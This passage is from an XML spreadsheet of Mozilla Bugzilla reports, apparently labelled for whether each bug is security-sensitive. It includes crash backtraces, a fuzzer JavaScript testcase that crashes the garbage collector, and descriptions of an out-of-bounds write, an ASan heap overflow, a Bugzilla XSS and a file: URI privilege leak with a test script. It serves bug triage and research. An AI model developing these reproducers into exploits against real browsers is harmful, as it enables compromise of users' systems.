#0  MOZ_CrashPrintf (aLine=aLine@entry=2579, aFormat=aFormat@entry=0xe96238 "Got 0x%lx expected magic word 0x%lx") at mfbt/Assertions.cpp:63
#1  0x00000000009eef1d in js::ReportMagicWordFailure (actual=&lt;optimized out&gt;, expected=expected@entry=11647069175327152089) at js/src/vm/TypeInference.cpp:2578
#2  0x0000000000a02a3f in js::TypeConstraint::checkMagic (this=0x7ffff49da0a0) at js/src/vm/TypeInference.h:586
#3  js::TypeConstraint::next (this=0x7ffff49da0a0) at js/src/vm/TypeInference.h:591
#4  js::ConstraintTypeSet::addType (this=0x7ffff5f55ca0, cx=0x7ffff5f15000, type=...) at js/src/vm/TypeInference.cpp:717
#5  0x0000000000a08a46 in js::TypeMonitorResult (cx=cx@entry=0x7ffff5f15000, script=&lt;optimized out&gt;, pc=&lt;optimized out&gt;, types=0x7ffff5f55ca0, type=...) at js/src/vm/TypeInference.cpp:3337
#6  0x00000000005c8f72 in js::TypeScript::Monitor (cx=cx@entry=0x7ffff5f15000, script=&lt;optimized out&gt;, pc=pc@entry=0x7ffff49f8140 "7\347\001", types=types@entry=0x7ffff5f55ca0, rval=...) at js/src/vm/TypeInference-inl.h:607
#7  0x00000000005b59ec in js::jit::DoGetElemFallback (cx=0x7ffff5f15000, frame=0x7fffffffcc88, stub_=0x7ffff49fa1c0, lhs=..., rhs=..., res=...) at js/src/jit/BaselineIC.cpp:615
#8  0x00002ffc609184e4 in ?? ()
#9  0x0000000000000000 in ?? ()
rax	0x1c37d20	29588768
rbx	0x7ffff5f55ca0	140737319885984
rcx	0x7fffffc2	2147483586
rdx	0x1c37ddd	29588957
rsi	0x0	0
rdi	0x1c37da0	29588896
rbp	0x7ffff5f15000	140737319620608
rsp	0x7fffffffc720	140737488340768
r8	0x0	0
r9	0x3d	61
r10	0x0	0
r11	0xfffffffffffffff1	-15
r12	0x7ffff49da0a0	140737297359008
r13	0x3	3
r14	0xa1a2b3b4c5c6d7d9	-6799674898382399527
r15	0x0	0
rip	0x42f7ac &lt;MOZ_CrashPrintf(int, char const*, ...)+243&gt;
=&gt; 0x42f7ac &lt;MOZ_CrashPrintf(int, char const*, ...)+243&gt;:	movl   $0x0,0x0
   0x42f7b7 &lt;MOZ_CrashPrintf(int, char const*, ...)+254&gt;:	ud2
Marking s-s because this looks like a type inference problem involving GC, which is potentially dangerous.</t>
        </is>
      </c>
      <c r="X103" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" t="n">
        <v>1434869</v>
      </c>
      <c r="B104" t="inlineStr">
        <is>
          <t>2018-02-01 02:52:52 -0800</t>
        </is>
      </c>
      <c r="C104" t="inlineStr">
        <is>
          <t>Tidy up no-unused-vars definitions &amp; anything else related to Ci/Cu/Cr/Cc usage in ESLint</t>
        </is>
      </c>
      <c r="D104" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E104" t="n">
        <v>1</v>
      </c>
      <c r="F104" t="n">
        <v>1</v>
      </c>
      <c r="G104" t="n">
        <v>7</v>
      </c>
      <c r="H104" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I104" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J104" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K104" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L104" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M104" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N104" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P104" t="inlineStr"/>
      <c r="Q104" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S104" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T104" t="n">
        <v>1</v>
      </c>
      <c r="U104" t="n">
        <v>0</v>
      </c>
      <c r="V104" t="n">
        <v>7</v>
      </c>
      <c r="W104" t="inlineStr">
        <is>
          <t>no-unused-vars has various whitelists - generally for `Cc|Ci|Cu|Cr|EXPORTED_SYMBOLS`, but also a few other things in places.
With the work going on in bug 1432992 we should be able to remove the C* ones.
Additionally, I think now that jsms have their own environment, we should be able to either whitelist EXPORTED_SYMBOLS just for jsms, or refine it in some manner so that we don't need to list it everywhere.</t>
        </is>
      </c>
      <c r="X104" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" t="n">
        <v>1846683</v>
      </c>
      <c r="B105" t="inlineStr">
        <is>
          <t>2023-08-02 00:01:10 -0700</t>
        </is>
      </c>
      <c r="C105" t="inlineStr">
        <is>
          <t>Missing array size check in FilterNodeD2D1</t>
        </is>
      </c>
      <c r="D105" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:13 -0700</t>
        </is>
      </c>
      <c r="E105" t="n">
        <v>1</v>
      </c>
      <c r="F105" t="n">
        <v>1</v>
      </c>
      <c r="G105" t="n">
        <v>3</v>
      </c>
      <c r="H105" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I105" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J105" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K105" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P105" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main118+][adv-esr115.3+]</t>
        </is>
      </c>
      <c r="Q105" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R105" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S105" t="inlineStr">
        <is>
          <t>119 Branch</t>
        </is>
      </c>
      <c r="T105" t="n">
        <v>1</v>
      </c>
      <c r="U105" t="n">
        <v>0</v>
      </c>
      <c r="V105" t="n">
        <v>19</v>
      </c>
      <c r="W105" t="inlineStr">
        <is>
          <t>Created attachment 9346859
result.txt
|FilterNodeD2D1| is used by graphics rendering. In certain situations, |mInputSurfaces| array is accessed in |SetInput()|[1]. However, the array index, |mIndex| is not verified properly. This is a typical out-of-bounds write scenario and there is an out-of-bounds write in another |SetInput()|[2].  I tried to make an ASAN report but I found it not easy. Instead, the callstack when crashed is attached.
[1]: https://searchfox.org/mozilla-central/source/gfx/2d/FilterNodeD2D1.cpp#690 
[2]: https://searchfox.org/mozilla-central/source/gfx/2d/FilterNodeD2D1.cpp#725 
REPRODUCE
Operating System: Windows
1.apply *patch.diff
2.visit index.html
*: Patch to emulate a compromised content process.
Crash State: see result.txt</t>
        </is>
      </c>
      <c r="X105" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" t="n">
        <v>529667</v>
      </c>
      <c r="B106" t="inlineStr">
        <is>
          <t>2009-11-18 15:10:45 -0800</t>
        </is>
      </c>
      <c r="C106" t="inlineStr">
        <is>
          <t>Stopping PB mode after opening a new window when PB is active is not possible</t>
        </is>
      </c>
      <c r="D106" t="inlineStr">
        <is>
          <t>2009-11-20 12:23:20 -0800</t>
        </is>
      </c>
      <c r="E106" t="n">
        <v>1</v>
      </c>
      <c r="F106" t="n">
        <v>1</v>
      </c>
      <c r="G106" t="n">
        <v>2</v>
      </c>
      <c r="H106" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I106" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J106" t="inlineStr">
        <is>
          <t>Private Browsing</t>
        </is>
      </c>
      <c r="K106" t="inlineStr">
        <is>
          <t>3.6 Branch</t>
        </is>
      </c>
      <c r="L106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N106" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P106" t="inlineStr"/>
      <c r="Q106" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R106" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S106" t="inlineStr">
        <is>
          <t>Firefox 3.7a1</t>
        </is>
      </c>
      <c r="T106" t="n">
        <v>1</v>
      </c>
      <c r="U106" t="n">
        <v>0</v>
      </c>
      <c r="V106" t="n">
        <v>12</v>
      </c>
      <c r="W106" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.3a1pre) Gecko/20091118 Minefield/3.7a1pre ID:20091118032442
Opening a new window while staying in Private Browsing mode will disable the "Stop Private Browsing" menu entry for that window. You have you switch to the origin window to be able to.
Steps:
1. Enter PB mode
2. Open a new window
3. Open the tools menu
In step 3 you will see that there is no way to stop the Private Browsing mode.
Given by ehsan this is a regression from bug 526194.</t>
        </is>
      </c>
      <c r="X106" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" t="n">
        <v>1881417</v>
      </c>
      <c r="B107" t="inlineStr">
        <is>
          <t>2024-02-21 21:22:52 -0800</t>
        </is>
      </c>
      <c r="C107" t="inlineStr">
        <is>
          <t>Crash [@ js::NativeObject::setDenseInitializedLengthInternal]</t>
        </is>
      </c>
      <c r="D107" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:59 -0700</t>
        </is>
      </c>
      <c r="E107" t="n">
        <v>1</v>
      </c>
      <c r="F107" t="n">
        <v>1</v>
      </c>
      <c r="G107" t="n">
        <v>3</v>
      </c>
      <c r="H107" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I107" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J107" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K107" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L107" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M107" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N107" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P107" t="inlineStr">
        <is>
          <t>[adv-main125+]</t>
        </is>
      </c>
      <c r="Q107" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R107" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S107" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T107" t="n">
        <v>1</v>
      </c>
      <c r="U107" t="n">
        <v>0</v>
      </c>
      <c r="V107" t="n">
        <v>16</v>
      </c>
      <c r="W107" t="inlineStr">
        <is>
          <t>Created attachment 9381916
debug stack
```
for (let x = 0; x &lt; 2; (function() { x++; })()) {};
function f() {
  var y = new (function () {})();
  (function () {
    Reflect.apply(y.toString, [], [0]);
  })();
}
f();
var z = [];
z.keepFailing = [];
oomTest(f, z);
dumpHeap();
```
```
(gdb) bt
#0  js::NativeObject::setDenseInitializedLengthInternal (this=0x8ce34b412f8, length=0) at /home/yksubu/trees/mozilla-central/js/src/vm/NativeObject.h:1477
#1  0x0000555557ee776a in js::NativeObject::setDenseInitializedLength (this=0x8ce34b412f8, length=0) at /home/yksubu/trees/mozilla-central/js/src/vm/NativeObject.h:1483
#2  js::jit::ShapeListObject::traceWeak (this=0x8ce34b412f8, trc=&lt;optimized out&gt;) at /home/yksubu/trees/mozilla-central/js/src/jit/BaselineCacheIRCompiler.cpp:2188
#3  0x000055555752369e in JSClass::doTrace (trc=0x7fffffffc780, obj=0x8ce34b412f8, this=&lt;optimized out&gt;) at /home/yksubu/shell-cache/js-dbg-64-linux-x86_64-f8dd4015fa59/objdir-js/dist/include/js/Class.h:653
#4  JSObject::traceChildren (this=0x8ce34b412f8, trc=0x7fffffffc780) at /home/yksubu/trees/mozilla-central/js/src/vm/JSObject.cpp:3343
#5  0x0000555557d687fb in JS::TraceChildren(JSTracer*, JS::GCCellPtr)::$_0::operator()&lt;JSObject*&gt;(JSObject*) const (t=0x8ce34b412f8, this=&lt;optimized out&gt;) at /home/yksubu/trees/mozilla-central/js/src/gc/Tracer.cpp:62
#6  JS::MapGCThingTyped&lt;JS::TraceChildren(JSTracer*, JS::GCCellPtr)::$_0&gt;(void*, JS::TraceKind, JS::TraceChildren(JSTracer*, JS::GCCellPtr)::$_0&amp;&amp;) (thing=0x8ce34b412f8, traceKind=&lt;optimized out&gt;, f=...) at /home/yksubu/shell-cache/js-dbg-64-linux-x86_64-f8dd4015fa59/objdir-js/dist/include/js/TraceKind.h:253
#7  JS::ApplyGCThingTyped&lt;JS::TraceChildren(JSTracer*, JS::GCCellPtr)::$_0&gt;(void*, JS::TraceKind, JS::TraceChildren(JSTracer*, JS::GCCellPtr)::$_0&amp;&amp;) (thing=0x8ce34b412f8, traceKind=&lt;optimized out&gt;, f=...) at /home/yksubu/shell-cache/js-dbg-64-linux-x86_64-f8dd4015fa59/objdir-js/dist/include/js/TraceKind.h:268
#8  JS::TraceChildren (trc=trc@entry=0x7fffffffc780, thing=...) at /home/yksubu/trees/mozilla-central/js/src/gc/Tracer.cpp:59
/snip
```
(Edit: see comment 2 for the real regressor)
Run with `--fuzzing-safe --no-threads --ion-eager`, compile with `AR=ar sh ../configure --enable-debug --enable-debug-symbols --with-ccache --enable-nspr-build --enable-ctypes --enable-gczeal --enable-rust-simd --disable-tests`, tested on m-c rev f8dd4015fa59.
Setting s-s to be safe. I'll set needinfo? from Jan as a start.</t>
        </is>
      </c>
      <c r="X107" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" t="n">
        <v>421123</v>
      </c>
      <c r="B108" t="inlineStr">
        <is>
          <t>2008-03-05 10:40:36 -0800</t>
        </is>
      </c>
      <c r="C108" t="inlineStr">
        <is>
          <t>talos shouldn't go red when failing to delete previous build zip</t>
        </is>
      </c>
      <c r="D108" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E108" t="n">
        <v>1</v>
      </c>
      <c r="F108" t="n">
        <v>1</v>
      </c>
      <c r="G108" t="n">
        <v>5</v>
      </c>
      <c r="H108" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I108" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J108" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K108" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L108" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M108" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N108" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P108" t="inlineStr"/>
      <c r="Q108" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R108" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S108" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T108" t="n">
        <v>1</v>
      </c>
      <c r="U108" t="n">
        <v>0</v>
      </c>
      <c r="V108" t="n">
        <v>7</v>
      </c>
      <c r="W108" t="inlineStr">
        <is>
          <t>WINNT 5.1 mini talos trunk fast qm-pxp-fast01 went red on its last cycle because it failed to delete the previous build zip (so Alice tells me). It shouldn't do that.</t>
        </is>
      </c>
      <c r="X108" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" t="n">
        <v>1075578</v>
      </c>
      <c r="B109" t="inlineStr">
        <is>
          <t>2014-10-01 08:08:17 -0700</t>
        </is>
      </c>
      <c r="C109" t="inlineStr">
        <is>
          <t>[SECURITY] Improper filtering of CGI arguments</t>
        </is>
      </c>
      <c r="D109" t="inlineStr">
        <is>
          <t>2014-10-06 11:49:47 -0700</t>
        </is>
      </c>
      <c r="E109" t="n">
        <v>1</v>
      </c>
      <c r="F109" t="n">
        <v>1</v>
      </c>
      <c r="G109" t="n">
        <v>4</v>
      </c>
      <c r="H109" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I109" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J109" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K109" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P109" t="inlineStr">
        <is>
          <t>EMBARGO until Monday Oct 6, 7am PDT (10am Eastern)</t>
        </is>
      </c>
      <c r="Q109" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R109" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S109" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T109" t="n">
        <v>1</v>
      </c>
      <c r="U109" t="n">
        <v>0</v>
      </c>
      <c r="V109" t="n">
        <v>29</v>
      </c>
      <c r="W109" t="inlineStr">
        <is>
          <t>I wrote a test in bug 1074980 to catch the |foo =&gt; $cgi-&gt;param()| syntax, and it found 15 places which use this syntax. The first one I checked is already exploitable (XSS), and I didn't look at the other ones yet. I think things are worse than expected in bug 1074812.
I will comment in this bug when new vulnerabilities are found, and will also update my patch accordingly.</t>
        </is>
      </c>
      <c r="X109" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" t="n">
        <v>1314702</v>
      </c>
      <c r="B110" t="inlineStr">
        <is>
          <t>2016-11-02 11:10:38 -0700</t>
        </is>
      </c>
      <c r="C110" t="inlineStr">
        <is>
          <t>[Breakdown] [Feedback] I want to be able to send feedback about my New Tab experience</t>
        </is>
      </c>
      <c r="D110" t="inlineStr">
        <is>
          <t>2016-11-29 10:22:26 -0800</t>
        </is>
      </c>
      <c r="E110" t="n">
        <v>1</v>
      </c>
      <c r="F110" t="n">
        <v>1</v>
      </c>
      <c r="G110" t="n">
        <v>2</v>
      </c>
      <c r="H110" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I110" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J110" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K110" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L110" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M110" t="inlineStr">
        <is>
          <t>iOS 10</t>
        </is>
      </c>
      <c r="N110" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P110" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q110" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R110" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S110" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T110" t="n">
        <v>1</v>
      </c>
      <c r="U110" t="n">
        <v>0</v>
      </c>
      <c r="V110" t="n">
        <v>1</v>
      </c>
      <c r="W110" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1314389 +++</t>
        </is>
      </c>
      <c r="X110" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" t="n">
        <v>746855</v>
      </c>
      <c r="B111" t="inlineStr">
        <is>
          <t>2012-04-18 19:05:36 -0700</t>
        </is>
      </c>
      <c r="C111" t="inlineStr">
        <is>
          <t>[ASan] READ heap-buffer-overflow in format-number()</t>
        </is>
      </c>
      <c r="D111" t="inlineStr">
        <is>
          <t>2012-10-10 18:40:02 -0700</t>
        </is>
      </c>
      <c r="E111" t="n">
        <v>1</v>
      </c>
      <c r="F111" t="n">
        <v>1</v>
      </c>
      <c r="G111" t="n">
        <v>3</v>
      </c>
      <c r="H111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I111" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J111" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K111" t="inlineStr">
        <is>
          <t>12 Branch</t>
        </is>
      </c>
      <c r="L111" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M111" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N111" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P111" t="inlineStr">
        <is>
          <t>[sg:moderate][asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q111" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R111" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S111" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T111" t="n">
        <v>1</v>
      </c>
      <c r="U111" t="n">
        <v>0</v>
      </c>
      <c r="V111" t="n">
        <v>35</v>
      </c>
      <c r="W111" t="inlineStr">
        <is>
          <t>Created attachment 616420
ASan error log
ASan trace :
==3077== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fafa86aa2dd at pc 0x7fafd761d317 bp 0x7ffff9c0aeb0 sp 0x7ffff9c0aea8
READ of size 1 at 0x7fafa86aa2dd thread T0
    #0 0x7fafd761d317 (/home/nicob/Asan/firefox/firefox+0x7fafd761d317)
    #1 0x7fafd74b0100 (/home/nicob/Asan/firefox/firefox+0x7fafd74b0100)
    #2 0x7fafd75f8989 (/home/nicob/Asan/firefox/firefox+0x7fafd75f8989)
    #3 0x7fafd769ed84 (/home/nicob/Asan/firefox/firefox+0x7fafd769ed84)
    #4 0x7fafdeccc060 (/home/nicob/Asan/firefox/firefox+0x7fafdeccc060)
    #5 0x7fafdaab5d32 (/home/nicob/Asan/firefox/firefox+0x7fafdaab5d32)
    [...]
0x7fafa86aa2dd is located 163 bytes to the left of 31-byte region [0x7fafa86aa380,0x7fafa86aa39f)
allocated by thread T0 here:
    #0 0x42cb94 (/home/nicob/Asan/firefox/firefox+0x42cb94)
    #1 0x7fafeced862e (/home/nicob/Asan/firefox/firefox+0x7fafeced862e)
    #2 0x7fafd76187f8 (/home/nicob/Asan/firefox/firefox+0x7fafd76187f8)
    #3 0x7fafd74b0100 (/home/nicob/Asan/firefox/firefox+0x7fafd74b0100)
    #4 0x7fafd75f8989 (/home/nicob/Asan/firefox/firefox+0x7fafd75f8989)
    #5 0x7fafd769ed84 (/home/nicob/Asan/firefox/firefox+0x7fafd769ed84)
    [...]
Tested versions :
- Firefox 11.0 / Windows XP 3 / x86
- Firefox 12.0a1 / Linux / x64 (public ASan build from https://people.mozilla.com/~choller/firefox/asan/)
Note : the offset of the invalid read can be manipulated by modifying the divisor.</t>
        </is>
      </c>
      <c r="X111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" t="n">
        <v>447579</v>
      </c>
      <c r="B112" t="inlineStr">
        <is>
          <t>2008-07-22 22:55:02 -0700</t>
        </is>
      </c>
      <c r="C112" t="inlineStr">
        <is>
          <t>[FIX]file: URIs inherit chrome privs if opened from chrome</t>
        </is>
      </c>
      <c r="D112" t="inlineStr">
        <is>
          <t>2009-01-14 12:37:21 -0800</t>
        </is>
      </c>
      <c r="E112" t="n">
        <v>1</v>
      </c>
      <c r="F112" t="n">
        <v>1</v>
      </c>
      <c r="G112" t="n">
        <v>3</v>
      </c>
      <c r="H112" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I112" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J112" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K112" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N112" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P112" t="inlineStr">
        <is>
          <t>[sg:moderate] post 1.8 branch</t>
        </is>
      </c>
      <c r="Q112" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R112" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S112" t="inlineStr">
        <is>
          <t>mozilla1.9.1b1</t>
        </is>
      </c>
      <c r="T112" t="n">
        <v>1</v>
      </c>
      <c r="U112" t="n">
        <v>0</v>
      </c>
      <c r="V112" t="n">
        <v>19</v>
      </c>
      <c r="W112" t="inlineStr">
        <is>
          <t>the security alias received a report from Luke Bryan that file: URIs are given chrome privileges if opened in the same tab as a chrome (or privileged about:) page. This does not happen in the latest Firefox 2.0.0.17pre.
Steps:
 1. create a local file that contains the following script:
  &lt;script&gt;
    try{ alert((Components.classes) ? "Chrome -- bad!" : "Invalid test"); }
    catch (e) { alert( "Not chrome -- good!"); throw (e); } 
  &lt;script&gt;
 2. open about:config
 3. in the same tab open the file created in step 1.
The first step is to get a regression range. It would be ironic if it were my bug 230606 "restrict file: abilities" fix.</t>
        </is>
      </c>
      <c r="X112" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" t="n">
        <v>1056038</v>
      </c>
      <c r="B113" t="inlineStr">
        <is>
          <t>2014-08-20 05:40:57 -0700</t>
        </is>
      </c>
      <c r="C113" t="inlineStr">
        <is>
          <t>Oops page on users with reviews on outdated webapp versions</t>
        </is>
      </c>
      <c r="D113" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E113" t="n">
        <v>1</v>
      </c>
      <c r="F113" t="n">
        <v>1</v>
      </c>
      <c r="G113" t="n">
        <v>6</v>
      </c>
      <c r="H113" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I113" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J113" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K113" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L113" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M113" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N113" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P113" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R113" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S113" t="inlineStr">
        <is>
          <t>2014-09</t>
        </is>
      </c>
      <c r="T113" t="n">
        <v>1</v>
      </c>
      <c r="U113" t="n">
        <v>0</v>
      </c>
      <c r="V113" t="n">
        <v>5</v>
      </c>
      <c r="W113" t="inlineStr">
        <is>
          <t>http://sentry.mktmon.services.phx1.mozilla.com/mkt/addonsmozillaorg/group/8504/
There's a "few" users (128) that have reviews on outdated (soft) deleted versions of webapps. When they go on their profile page, they get a 500 "oops" page.
The issue is that there's still webapps in the database that are not cleaned (see bug 1020465), and those webapps may have soft deleted versions (versions with the "deleted" field set to 1). Those soft deleted versions are excluded by the VersionManager, so when you get all the reviews and try to display their version (only if the version is outdated), you get a "Version matching query does not exist" error.</t>
        </is>
      </c>
      <c r="X113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" t="n">
        <v>851418</v>
      </c>
      <c r="B114" t="inlineStr">
        <is>
          <t>2013-03-14 22:32:10 -0700</t>
        </is>
      </c>
      <c r="C114" t="inlineStr">
        <is>
          <t>"Assertion failure: XPCJSRuntime::Get()-&gt;GetJSContextStack()-&gt;Peek() == cx"</t>
        </is>
      </c>
      <c r="D114" t="inlineStr">
        <is>
          <t>2015-01-05 17:34:35 -0800</t>
        </is>
      </c>
      <c r="E114" t="n">
        <v>1</v>
      </c>
